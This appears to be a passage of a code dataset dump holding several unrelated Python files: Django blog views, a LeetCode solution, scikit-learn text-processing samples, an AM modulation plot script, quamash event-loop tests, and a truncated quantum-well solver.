tc=tc-1","sub_path":"Practice/Beginner/CENS20D.py","file_name":"CENS20D.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"283590314","text":"from django.shortcuts import render\nfrom django.http import Http404\nfrom .models import Chapter\n\n# Create your views here.\n\nPAGE_POST_NUM = 6\n\ndef pages(request, page_id=0):\n\tpage_id = int(page_id)\n\tQuerySet = Chapter.objects.filter(type=\"Blog\")\n\ttotal_num = QuerySet.count()\n\ttotal_page = (total_num+PAGE_POST_NUM-1)/PAGE_POST_NUM\n\tfirst_index = page_id*PAGE_POST_NUM\n\n\tchapter_list = QuerySet.order_by(\"-pub_date\")\n\tchapter_list = chapter_list[first_index:first_index+PAGE_POST_NUM]\n\tcontext = {\"chapter_list\":chapter_list, \"last_page\":page_id-1, \"next_page\":page_id+1, \"now_page\":page_id}\n\tif page_id <= 0:\n\t\tcontext[\"have_prev\"] = 0\n\telse:\n\t\tcontext[\"have_prev\"] = 1\n\tif page_id >= total_page-1:\n\t\tcontext[\"have_next\"] = 0\n\telse:\n\t\tcontext[\"have_next\"] = 1\n\treturn render(request, \"blog/posts.html\", context)\n\ndef post(request, back_info, post_id):\n\tpost_id = int(post_id)\n\tchapter_list = Chapter.objects.filter(id=post_id)\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":back_info}\n\treturn render(request, \"blog/post.html\", context)\n\ndef archives(request):\n\tQuerySet = Chapter.objects.filter(type=\"Blog\")\n\tchapter_list = QuerySet.order_by(\"-pub_date\")\n\tchapter_dict = {}\n\tfor chapter in chapter_list:\n\t\tyear = chapter.pub_date.year\n\t\tlist = chapter_dict.setdefault(year, [])\n\t\tlist.append(chapter)\n\tchapter_info = []\n\tfor year, chapter_list in sorted(chapter_dict.iteritems(), reverse=True):\n\t\tchapter_info.append({\"year\":year, \"chapter_list\":chapter_list})\n\tcontext = {\"chapter_info\":chapter_info}\n\treturn render(request, \"blog/archives.html\", context)\n\ndef about(request):\n\tchapter_list = Chapter.objects.filter(type=\"About\")\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":\"\"}\n\treturn render(request, \"blog/post.html\", context)\n\ndef books(request):\n\tchapter_list = Chapter.objects.filter(type=\"Books\")\n\tchapter = chapter_list[0]\n\tchapter.open_times += 1\n\tchapter.save()\n\tcontext = {\"chapter\":chapter, \"back\":\"\"}\n\treturn render(request, \"blog/post.html\", context)\n\n","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"317503842","text":"# Runtime: 20ms\n# Your runtime beats 100% of python submissions.\n\nclass Solution(object):\n def letterCombinations(self, digits):\n \"\"\"\n :type digits: str\n :rtype: List[str]\n \"\"\"\n if digits == '': return []\n ans = []\n phoneMap = [[], ['a', 'b', 'c'], ['d', 'e', 'f'], ['g', 'h', 'i'], ['j', 'k', 'l'], ['m', 'n', 'o'], ['p', 'q', 'r', 's'], ['t', 'u', 'v'], ['w', 'x', 'y', 'z']]\n\n def compute(rest, formedStr):\n if rest == '':\n ans.append(formedStr)\n return\n for letter in phoneMap[int(rest[0]) - 1]:\n compute(rest[1:], formedStr + letter)\n\n compute(digits, '')\n return ans\n","sub_path":"11-20/17_letter_combinations_of_a_phone_number.py","file_name":"17_letter_combinations_of_a_phone_number.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"186743418","text":"#########################################################################################\r\n############# Sample Code in the Book: Introduction to ML with Python #############\r\n#########################################################################################\r\n\r\n# Part 7: Working with text data\r\n\r\n# 1. bag of words\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nvect = CountVectorizer()\r\nvect.fit(xxx)\r\nvect.vocabulary_ # this is a dictionary with key (words) and value (counts)\r\nbag_of_words = vect.transform(bards_words)\r\nbag_of_words.toarray()\r\n\r\n# bag of word for movie reviews\r\nvect = CountVectorizer().fit(text_train)\r\nX_train = vect.transform(text_train)\r\nfeature_names = vect.get_feature_names()\r\n\r\nfrom sklearn.model_selection import cross_val_score\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.model_selection import GridSearchCV\r\nparam_grid = {'C': [0.001, 0.01, 0.1, 1, 10]}\r\n\r\ngrid = GridSearchCV(LogisticRegression(), param_grid, cv=5)\r\ngrid.fit(X_train, y_train)\r\n\r\nprint(\"Best cross-validation score: {:.2f}\".format(grid.best_score_))\r\nprint(\"Best parameters: \", grid.best_params_)\r\n\r\nX_test = vect.transform(text_test)\r\ngrid.score(X_test, y_test)\r\n\r\n# with min_df\r\nvect = CountVectorizer(min_df=5).fit(text_train)\r\nX_train = vect.transform(text_train)\r\nprint(\"X_train with min_df: {}\".format(repr(X_train)))\r\n\r\n\r\n# 2. stop words\r\nfrom sklearn.feature_extraction import ENGLISH_STOP_WORDS\r\nvect = CountVectorizer(min_df=5, stop_words = \"english\").fit(text_train)\r\nX_train = vect.transform(text_train)\r\nrepr(X_train)\r\n\r\ngrid = GridSearchCV(LogisticRegression(), param_grod, cv=5)\r\ngrid.fit(X_train, y_train)\r\ngrid.best_score_\r\ngrid.best_params_\r\n\r\n# 3. tf-idf: term frequency–inverse document frequency\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.pipeline import make_pipeline\r\npipe = make_pipeline(TfidfVectorizer(min_df=5, norm=None), LogisticRegression())\r\nparam_grid = {'logisticregression__C':[0.001,0.01,0.1,1,10]}\r\ngrid = GridSearchCV(pipe, param_grid, cv=5)\r\ngrid.fit(text_train, y_train)\r\ngrid.best_score_\r\n\r\n\r\n\r\nvectorizer = grid.best_estimator_.name_steps[\"tfidfvectorizer\"]\r\nX_train = vectorizer.transform(text_train)\r\nmax_value = X_train.max(axis=0).toarray().ravel()\r\nsorted_by_tfidf = max_value.argsort()\r\nfeature_names = np.array(vectorizer.get_feature_names())\r\nfeature_names[sorted_by_tfidf[:20]]\r\nfeature_names[sorted_by_tfidf[-20:]]\r\n\r\n\r\n\r\n# 4. n-grams\r\ncv = CountVectorizer(ngram_range=(2, 2)).fit(xxxx)\r\ncv1 = CountVectorizer(ngram_range=(1, 3)).fit(xxxx)\r\nprint(\"Vocabulary size: {}\".format(len(cv.vocabulary_)))\r\nprint(\"Vocabulary:\\n{}\".format(cv.get_feature_names()))\r\n\r\npipe = make_pipeline(TfidfVectorizer(min_df=5), LogisticRegression())\r\n# running the grid-search takes a long time because of the\r\n# relatively large grid and the inclusion of trigrams\r\nparam_grid = {'logisticregression__C': [0.001, 0.01, 0.1, 1, 10, 100],\r\n \"tfidfvectorizer__ngram_range\": [(1, 1), (1, 2), (1, 3)]}\r\n\r\ngrid = GridSearchCV(pipe, param_grid, cv=5)\r\ngrid.fit(text_train, y_train)\r\nprint(\"Best cross-validation score: {:.2f}\".format(grid.best_score_))\r\nprint(\"Best parameters:\\n{}\".format(grid.best_params_))\r\n# extract scores from grid_search\r\nscores = grid.cv_results_['mean_test_score'].reshape(-1, 3).T\r\n# visualize heat map\r\nheatmap = mglearn.tools.heatmap(\r\n scores, xlabel=\"C\", ylabel=\"ngram_range\", cmap=\"viridis\", fmt=\"%.3f\",\r\n xticklabels=param_grid['logisticregression__C'],\r\n yticklabels=param_grid['tfidfvectorizer__ngram_range'])\r\nplt.colorbar(heatmap)\r\n\r\n# find 3-gram features\r\nmask = np.array([len(feature.split(\" \")) for feature in feature_names]) == 3\r\n# visualize only 3-gram features\r\nmglearn.tools.visualize_coefficients(coef.ravel()[mask],\r\n feature_names[mask], n_top_features=40)\r\nplt.ylim(-22, 22)\r\n\r\n\r\n# 5. tokenization, stemming and lemmatization\r\nimport spacy\r\nimport nltk\r\n\r\n# load spacy's English-language models\r\nen_nlp = spacy.load('en')\r\n# instantiate nltk's Porter stemmer\r\nstemmer = nltk.stem.PorterStemmer()\r\n\r\n# define function to compare lemmatization in spacy with stemming in nltk\r\ndef compare_normalization(doc):\r\n # tokenize document in spacy\r\n doc_spacy = en_nlp(doc)\r\n # print lemmas found by spacy\r\n print(\"Lemmatization:\")\r\n print([token.lemma_ for token in doc_spacy])\r\n # print tokens found by Porter stemmer\r\n print(\"Stemming:\")\r\n print([stemmer.stem(token.norm_.lower()) for token in doc_spacy])\r\n\r\n\r\n# 5.1 regular expression based tokenizer\r\n# Technicallity: we want to use the regexp based tokenizer\r\n# that is used by CountVectorizer and only use the lemmatization\r\n# from SpaCy. To this end, we replace en_nlp.tokenizer (the SpaCy tokenizer)\r\n# with the regexp based tokenization\r\nimport re\r\n# regexp used in CountVectorizer:\r\nregexp = re.compile('(?u)\\\\b\\\\w\\\\w+\\\\b')\r\n# load spacy language model\r\nen_nlp = spacy.load('en', disable=['parser', 'ner'])\r\nold_tokenizer = en_nlp.tokenizer\r\n# replace the tokenizer with the preceding regexp\r\nen_nlp.tokenizer = lambda string: old_tokenizer.tokens_from_list(\r\n regexp.findall(string))\r\n\r\n# create a custom tokenizer using the SpaCy document processing pipeline\r\n# (now using our own tokenizer)\r\ndef custom_tokenizer(document):\r\n doc_spacy = en_nlp(document)\r\n return [token.lemma_ for token in doc_spacy]\r\n\r\n# define a count vectorizer with the custom tokenizer\r\nlemma_vect = CountVectorizer(tokenizer=custom_tokenizer, min_df=5)\r\n\r\n# transform text_train using CountVectorizer with lemmatization\r\nX_train_lemma = lemma_vect.fit_transform(text_train)\r\nprint(\"X_train_lemma.shape: {}\".format(X_train_lemma.shape))\r\n\r\n# standard CountVectorizer for reference\r\nvect = CountVectorizer(min_df=5).fit(text_train)\r\nX_train = vect.transform(text_train)\r\nprint(\"X_train.shape: {}\".format(X_train.shape))\r\n\r\n\r\n# 6. Topic modeling\r\n# LDA: Latent Dirichlet Allocation\r\n\r\nvect = CountVectorizer(max_features=10000, max_df=.15)\r\nX = vect.fit_transform(text_train)\r\nfrom sklearn.decomposition import LatentDirichletAllocation\r\nlda = LatentDirichletAllocation(n_topics=10, learning_method=\"batch\",\r\n max_iter=25, random_state=0)\r\n# We build the model and transform the data in one step\r\n# Computing transform takes some time,\r\n# and we can save time by doing both at once\r\ndocument_topics = lda.fit_transform(X)\r\nprint(\"lda.components_.shape: {}\".format(lda.components_.shape))\r\n\r\n# for each topic (a row in the components_), sort the features (ascending).\r\n# Invert rows with [:, ::-1] to make sorting descending\r\nsorting = np.argsort(lda.components_, axis=1)[:, ::-1]\r\n# get the feature names from the vectorizer:\r\nfeature_names = np.array(vect.get_feature_names())\r\n# Print out the 10 topics:\r\nmglearn.tools.print_topics(topics=range(10), feature_names=feature_names,\r\n sorting=sorting, topics_per_chunk=5, n_words=10)\r\n\t\t\t\t\t\t \r\n\t\t\t\t\t\t \r\n# sort by weight of \"music\" topic 45\r\nmusic = np.argsort(document_topics100[:, 45])[::-1]\r\n# print the five documents where the topic is most important\r\nfor i in music[:10]:\r\n # show first two sentences\r\n print(b\".\".join(text_train[i].split(b\".\")[:2]) + b\".\\n\")\r\n\r\n\t\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"SampleCodes/Sample Codes_Part 7_20200119.py","file_name":"Sample Codes_Part 7_20200119.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"317936538","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import fftpack\n\n# Parâmetros do sinal\nAc = 2 # Amplitude da portadora\nMu = 0.7 # Índice de modulação\nfc = 25000 # Frequência da portadora Hz\nfm = 5000\nN = 10000\nTs = 1e-6 # Tempo de amostragem pequeno (modelar sinal contínuo)\nt = np.arange(N)*Ts\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\n\n\n# Gráfico do AM-DSB no tempo\nplt.figure(1,[10,7])\nplt.subplot(321)\nplt.plot(t,s)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Tempo [s]\")\nplt.ylabel(\"Amplitude\")\n\n# Gráfico do AM-DSB na frequência\nplt.subplot(322)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\nplt.plot(S_f)\n\nplt.subplot(323)\n\nMu = 1.0\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.ylabel(\"Amplitude (v)\")\nplt.xlabel(\"Tempo [s]\")\nplt.plot(t,s)\n\n\n\nplt.subplot(324)\n\n\n\n\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\n\nplt.plot(S_f)\n\n\n\nplt.subplot(325)\nMu = 2.0\ns = Ac*(1+Mu*np.cos(2*np.pi*fm*t))*np.cos(2*np.pi*fc*t)\nplt.plot(t,s)\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Tempo [s]\")\nplt.ylabel(\"Amplitude\")\n\n\nplt.subplot(326)\n\n\n\n\n\nplt.title(\"AM-DSB (padrão), M=\"+str(Mu))\nplt.xlabel(\"Frequência [kHz]\")\nplt.ylabel(\"Magnitude\")\nS_f = np.abs(np.fft.fftshift(np.fft.fft(s)))\n\nplt.plot(S_f)\n\n\n\nplt.tight_layout()\nplt.show()","sub_path":"efeito_indice_modulacao_3_casos.py","file_name":"efeito_indice_modulacao_3_casos.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"97493599","text":"# © 2013 Mark Harviston \n# © 2014 Arve Knudsen \n# BSD License\nimport asyncio\nimport locale\nimport logging\nimport sys\nimport ctypes\nimport multiprocessing\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\nimport socket\n\nimport quamash\n\nimport pytest\n\n\nclass _SubprocessProtocol(asyncio.SubprocessProtocol):\n\tdef __init__(self, *args, **kwds):\n\t\tsuper(_SubprocessProtocol, self).__init__(*args, **kwds)\n\t\tself.received_stdout = None\n\n\tdef pipe_data_received(self, fd, data):\n\t\ttext = data.decode(locale.getpreferredencoding(False))\n\t\tif fd == 1:\n\t\t\tself.received_stdout = text.strip()\n\n\tdef process_exited(self):\n\t\tasyncio.get_event_loop().stop()\n\n\n@pytest.fixture(scope='session')\ndef application():\n\treturn quamash.QApplication.instance() or quamash.QApplication([])\n\n\n@pytest.fixture\ndef loop(request, application):\n\tlp = quamash.QEventLoop(application)\n\tasyncio.set_event_loop(lp)\n\n\tdef fin():\n\t\tsys.excepthook = orig_excepthook\n\n\t\ttry:\n\t\t\tlp.close()\n\t\tfinally:\n\t\t\tasyncio.set_event_loop(None)\n\n\tdef excepthook(type, *args):\n\t\tlp.stop()\n\t\torig_excepthook(type, *args)\n\n\torig_excepthook = sys.excepthook\n\tsys.excepthook = excepthook\n\n\trequest.addfinalizer(fin)\n\treturn lp\n\n\n@pytest.fixture(\n\tparams=[None, quamash.QThreadExecutor, ThreadPoolExecutor, ProcessPoolExecutor]\n)\ndef executor(request):\n\texc_cls = request.param\n\tif exc_cls is None:\n\t\treturn None\n\n\texc = exc_cls(1) # FIXME? fixed number of workers?\n\trequest.addfinalizer(exc.shutdown)\n\treturn exc\n\n\nclass TestCanRunTasksInExecutor:\n\t\"\"\"\n\tThis needs to be a class because pickle can't serialize closures,\n\tbut can serialize bound methods.\n\tmultiprocessing can only handle pickleable functions.\n\t\"\"\"\n\tdef test_can_run_tasks_in_executor(self, loop, executor):\n\t\t\"\"\"Verify that tasks can be run in an executor.\"\"\"\n\t\tlogging.debug('Loop: {!r}'.format(loop))\n\t\tlogging.debug('Executor: {!r}'.format(executor))\n\n\t\tmanager = multiprocessing.Manager()\n\t\twas_invoked = manager.Value(ctypes.c_int, 0)\n\t\tlogging.debug('running until complete')\n\t\tloop.run_until_complete(self.blocking_task(loop, executor, was_invoked))\n\t\tlogging.debug('ran')\n\n\t\tassert was_invoked.value == 1\n\n\tdef blocking_func(self, was_invoked):\n\t\tlogging.debug('start blocking_func()')\n\t\twas_invoked.value = 1\n\t\tlogging.debug('end blocking_func()')\n\n\t@asyncio.coroutine\n\tdef blocking_task(self, loop, executor, was_invoked):\n\t\tlogging.debug('start blocking task()')\n\t\tfut = loop.run_in_executor(executor, self.blocking_func, was_invoked)\n\t\tyield from asyncio.wait_for(fut, timeout=5.0)\n\t\tlogging.debug('start blocking task()')\n\n\ndef test_can_handle_exception_in_default_executor(loop):\n\t\"\"\"Verify that exceptions from tasks run in default (threaded) executor are handled.\"\"\"\n\tdef blocking_func():\n\t\traise Exception('Testing')\n\n\twith pytest.raises(Exception) as excinfo:\n\t\tloop.run_until_complete(loop.run_in_executor(None, blocking_func))\n\n\tassert str(excinfo.value) == 'Testing'\n\n\ndef test_can_execute_subprocess(loop):\n\t\"\"\"Verify that a subprocess can be executed.\"\"\"\n\ttransport, protocol = loop.run_until_complete(loop.subprocess_exec(\n\t\t_SubprocessProtocol, sys.executable or 'python', '-c', 'print(\\'Hello async world!\\')'))\n\tloop.run_forever()\n\tassert transport.get_returncode() == 0\n\tassert protocol.received_stdout == 'Hello async world!'\n\n\ndef test_can_terminate_subprocess(loop):\n\t\"\"\"Verify that a subprocess can be terminated.\"\"\"\n\t# Start a never-ending process\n\ttransport = loop.run_until_complete(\n\t\tloop.subprocess_exec(\n\t\t\t_SubprocessProtocol, sys.executable or 'python', '-c', 'import time\\nwhile True: time.sleep(1)',\n\t\t),\n\t)[0]\n\t# Terminate!\n\ttransport.kill()\n\t# Wait for process to die\n\tloop.run_forever()\n\n\tassert transport.get_returncode() != 0\n\n\ndef test_loop_running(loop):\n\t\"\"\"Verify that loop.is_running returns True when running\"\"\"\n\t@asyncio.coroutine\n\tdef is_running():\n\t\tnonlocal loop\n\t\tassert loop.is_running()\n\n\tloop.run_until_complete(is_running())\n\n\ndef test_loop_not_running(loop):\n\t\"\"\"Verify that loop.is_running returns False when not running\"\"\"\n\tassert not loop.is_running()\n\n\ndef test_can_function_as_context_manager(application):\n\t\"\"\"Verify that a QEventLoop can function as its own context manager.\"\"\"\n\twith quamash.QEventLoop(application) as loop:\n\t\tassert isinstance(loop, quamash.QEventLoop)\n\t\tloop.call_soon(loop.stop)\n\t\tloop.run_forever()\n\n\ndef test_future_not_done_on_loop_shutdown(loop):\n\t\"\"\"Verify RuntimError occurs when loop stopped before Future completed with run_until_complete.\"\"\"\n\tloop.call_later(1, loop.stop)\n\tfut = asyncio.Future()\n\twith pytest.raises(RuntimeError):\n\t\tloop.run_until_complete(fut)\n\n\ndef test_call_later_must_not_coroutine(loop):\n\t\"\"\"Verify TypeError occurs call_later is given a coroutine.\"\"\"\n\tmycoro = asyncio.coroutine(lambda: None)\n\n\twith pytest.raises(TypeError):\n\t\tloop.call_soon(mycoro)\n\n\ndef test_call_later_must_be_callable(loop):\n\t\"\"\"Verify TypeError occurs call_later is not given a callable.\"\"\"\n\tnot_callable = object()\n\twith pytest.raises(TypeError):\n\t\tloop.call_soon(not_callable)\n\n\ndef test_call_at(loop):\n\t\"\"\"Verify that loop.call_at works as expected.\"\"\"\n\tdef mycallback():\n\t\tnonlocal was_invoked\n\t\twas_invoked = True\n\twas_invoked = False\n\n\tloop.call_at(loop.time() + .1, mycallback)\n\tloop.run_until_complete(asyncio.sleep(.5))\n\n\tassert was_invoked\n\n\ndef test_get_set_debug(loop):\n\t\"\"\"Verify get_debug and set_debug work as expected.\"\"\"\n\tloop.set_debug(True)\n\tassert loop.get_debug()\n\tloop.set_debug(False)\n\tassert not loop.get_debug()\n\n\n@pytest.fixture\ndef sock_pair(request):\n\t\"\"\"Create socket pair.\n\n\tIf socket.socketpair isn't available, we emulate it.\n\t\"\"\"\n\tdef fin():\n\t\tif client_sock is not None:\n\t\t\tclient_sock.close()\n\t\tif srv_sock is not None:\n\t\t\tsrv_sock.close()\n\n\tclient_sock = srv_sock = None\n\trequest.addfinalizer(fin)\n\n\t# See if socketpair() is available.\n\thave_socketpair = hasattr(socket, 'socketpair')\n\tif have_socketpair:\n\t\tclient_sock, srv_sock = socket.socketpair()\n\t\treturn client_sock, srv_sock\n\n\t# Create a non-blocking temporary server socket\n\ttemp_srv_sock = socket.socket()\n\ttemp_srv_sock.setblocking(False)\n\ttemp_srv_sock.bind(('', 0))\n\tport = temp_srv_sock.getsockname()[1]\n\ttemp_srv_sock.listen(1)\n\n\t# Create non-blocking client socket\n\tclient_sock = socket.socket()\n\tclient_sock.setblocking(False)\n\ttry:\n\t\tclient_sock.connect(('localhost', port))\n\texcept socket.error as err:\n\t\t# Error 10035 (operation would block) is not an error, as we're doing this with a\n\t\t# non-blocking socket.\n\t\tif err.errno != 10035:\n\t\t\traise\n\n\t# Use select to wait for connect() to succeed.\n\timport select\n\ttimeout = 1\n\treadable = select.select([temp_srv_sock], [], [], timeout)[0]\n\tif temp_srv_sock not in readable:\n\t\traise Exception('Client socket not connected in {} second(s)'.format(timeout))\n\tsrv_sock, _ = temp_srv_sock.accept()\n\n\treturn client_sock, srv_sock\n\n\ndef test_can_add_reader(loop, sock_pair):\n\t\"\"\"Verify that we can add a reader callback to an event loop.\"\"\"\n\tdef can_read():\n\t\tif fut.done():\n\t\t\treturn\n\n\t\tdata = srv_sock.recv(1)\n\t\tif len(data) != 1:\n\t\t\treturn\n\n\t\tnonlocal got_msg\n\t\tgot_msg = data\n\t\t# Indicate that we're done\n\t\tfut.set_result(None)\n\t\tsrv_sock.close()\n\n\tdef write():\n\t\tclient_sock.send(ref_msg)\n\t\tclient_sock.close()\n\n\tref_msg = b'a'\n\tclient_sock, srv_sock = sock_pair\n\tloop.call_soon(write)\n\n\texp_num_notifiers = len(loop._read_notifiers) + 1\n\tgot_msg = None\n\tfut = asyncio.Future()\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\tassert len(loop._read_notifiers) == exp_num_notifiers, 'Notifier should be added'\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\tassert got_msg == ref_msg\n\n\ndef test_can_remove_reader(loop, sock_pair):\n\t\"\"\"Verify that we can remove a reader callback from an event loop.\"\"\"\n\tdef can_read():\n\t\tdata = srv_sock.recv(1)\n\t\tif len(data) != 1:\n\t\t\treturn\n\n\t\tnonlocal got_msg\n\t\tgot_msg = data\n\n\tclient_sock, srv_sock = sock_pair\n\n\tgot_msg = None\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\texp_num_notifiers = len(loop._read_notifiers) - 1\n\tloop.remove_reader(srv_sock.fileno())\n\tassert len(loop._read_notifiers) == exp_num_notifiers, 'Notifier should be removed'\n\tclient_sock.send(b'a')\n\tclient_sock.close()\n\t# Run for a short while to see if we get a read notification\n\tloop.call_later(0.1, loop.stop)\n\tloop.run_forever()\n\n\tassert got_msg is None, 'Should not have received a read notification'\n\n\ndef test_can_add_writer(loop, sock_pair):\n\t\"\"\"Verify that we can add a writer callback to an event loop.\"\"\"\n\tdef can_write():\n\t\tif not fut.done():\n\t\t\t# Indicate that we're done\n\t\t\tfut.set_result(None)\n\t\t\tclient_sock.close()\n\n\tclient_sock, _ = sock_pair\n\tfut = asyncio.Future()\n\tloop.add_writer(client_sock.fileno(), can_write)\n\tassert len(loop._write_notifiers) == 1, 'Notifier should be added'\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\ndef test_can_remove_writer(loop, sock_pair):\n\t\"\"\"Verify that we can remove a writer callback from an event loop.\"\"\"\n\tclient_sock, _ = sock_pair\n\tloop.add_writer(client_sock.fileno(), lambda: None)\n\tloop.remove_writer(client_sock.fileno())\n\tassert not loop._write_notifiers, 'Notifier should be removed'\n\n\ndef test_add_reader_should_disable_qsocket_notifier_on_callback(loop, sock_pair):\n\t\"\"\"Verify that add_reader disables QSocketNotifier during callback.\"\"\"\n\tdef can_read():\n\t\tnonlocal num_calls\n\t\tnum_calls += 1\n\n\t\tif num_calls == 2:\n\t\t\t# Since we get called again, the QSocketNotifier should've been re-enabled before\n\t\t\t# this call (although disabled during)\n\t\t\tassert not notifier.isEnabled()\n\t\t\tsrv_sock.recv(1)\n\t\t\tfut.set_result(None)\n\t\t\tsrv_sock.close()\n\t\t\treturn\n\n\t\tassert not notifier.isEnabled()\n\n\tdef write():\n\t\tclient_sock.send(b'a')\n\t\tclient_sock.close()\n\n\tnum_calls = 0\n\tclient_sock, srv_sock = sock_pair\n\tloop.call_soon(write)\n\n\tfut = asyncio.Future()\n\tloop.add_reader(srv_sock.fileno(), can_read)\n\tnotifier = loop._read_notifiers[srv_sock.fileno()]\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n\n\ndef test_add_writer_should_disable_qsocket_notifier_on_callback(loop, sock_pair):\n\t\"\"\"Verify that add_writer disables QSocketNotifier during callback.\"\"\"\n\tdef can_write():\n\t\tnonlocal num_calls\n\t\tnum_calls += 1\n\n\t\tif num_calls == 2:\n\t\t\t# Since we get called again, the QSocketNotifier should've been re-enabled before\n\t\t\t# this call (although disabled during)\n\t\t\tassert not notifier.isEnabled()\n\t\t\tfut.set_result(None)\n\t\t\tclient_sock.close()\n\t\t\treturn\n\n\t\tassert not notifier.isEnabled()\n\n\tnum_calls = 0\n\tclient_sock, _ = sock_pair\n\tfut = asyncio.Future()\n\tloop.add_writer(client_sock.fileno(), can_write)\n\tnotifier = loop._write_notifiers[client_sock.fileno()]\n\tloop.run_until_complete(asyncio.wait_for(fut, timeout=1.0))\n","sub_path":"tests/test_qeventloop.py","file_name":"test_qeventloop.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"563058629","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jun 15 12:19:23 2019\r\n\r\n@author: jules.fillette\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\r\n#Nom du programme : PuitsQuantique\r\n\r\n#Auteurs : Arnaud Raoux, François Lévrier, Emmanuel Baudin et la prépa agreg de Montrouge\r\n#Adresse : Departement de physique de l'Ecole Normale Superieure\r\n#\t\t24 rue Lhomond\r\n#\t\t75005 Paris\r\n#Contact : arnaud.raoux@ens.fr\r\n#\r\n#Année de création : 2016 \r\n#Version : 1.0\r\n\r\n#Liste des modifications\r\n#v 1.00 : 2016-03-01 Première version complète\r\n\r\n#Version de Python\r\n#3.4\r\n\r\n#LICENCE\r\n#Cette oeuvre, création, site ou texte est sous licence Creative Commons Attribution - Pas d'Utilisation Commerciale 4.0 International. Pour accéder à une copie de cette licence, merci de vous rendre à l'adresse suivante http://creativecommons.org/licenses/by-nc/4.0/ ou envoyez un courrier à Creative Commons, 444 Castro Street, Suite 900, Mountain View, California, 94041, USA.\r\n\r\n#Description : \r\n#Ce programme permet de représenter les niveaux d'énergie dans un puits quantique, ainsi que les fonctions d'onde correspondantes. Il est inspiré d'un programme détaillé dans les références.\r\n\r\n\r\n#import des bibliothèques python\r\nfrom pylab import *\r\nfrom scipy.integrate import odeint, simps # Pour la resolution d'equations differentielles\r\nfrom scipy.optimize import brentq # Pour trouver les zeros d'une fonction\r\n\r\n# =============================================================================\r\n# --- References ------------------------------------------------\r\n# =============================================================================\r\n\r\n## Griffiths, Introduction to Quantum Mechanics, 1st edition, page 62.\r\n## https://helentronica.wordpress.com/2014/09/04/quantum-mechanics-with-the-python/\r\n\r\n# =============================================================================\r\n# --- Definitions ------------------------------------------------\r\n# =============================================================================\r\n\r\n\r\nN = 1000 # Discrétisation du puits\r\npsi = np.zeros([N,2]) # Vecteur contenant [psi, psi']\r\npsi0 = array([0,1]) # Condition initiale pour psi0\r\nVo = 10 # Hauteur du puits quantique\r\nE = 0.0 # Variable globale amenée à changer\r\nb = 2 # Point en dehors du puits pour vérifier si la fonction diverge\r\nx = linspace(-b, b, N) # Abscisses\r\nL=1 # Largeur du puits\r\n\r\n# =============================================================================\r\n# --- Fonctions intermediaires ------------------------------------------------\r\n# =============================================================================\r\n\r\ndef V(x):\r\n \"\"\"\r\n Potentiel du puits quantique. L est la largeur du puits, et Vo la hauteur\r\n \"\"\"\r\n if abs(x) < L:\r\n return 0\r\n else:\r\n return Vo\r\n\r\ndef SE(psi, x):\r\n \"\"\"\r\n Fonction qui renvoie le vecteur (psi',psi'') grâce a l'équation de Schroöinger\r\n \"\"\"\r\n state0 = psi[1]\r\n state1 = 2.0*(V(x) - E)*psi[0]\r\n return array([state0, state1])\r\n \r\ndef Wave_function(energy):\r\n \"\"\"\r\n Calcule la fonction d'onde solution de l'équation de Schrödinger, et renvoie sa valeur en b\r\n \"\"\"\r\n global psi,E\r\n \r\n E = energy\r\n psi = odeint(SE, psi0, x)\r\n norm = simps(psi[:,0]**2,x)\r\n psi = psi/np.sqrt(norm)\r\n return psi[-1,0]\r\n \r\ndef find_all_zeroes(x,y):\r\n \"\"\"\r\n Donne tous les zéros de y = Psi(x)\r\n 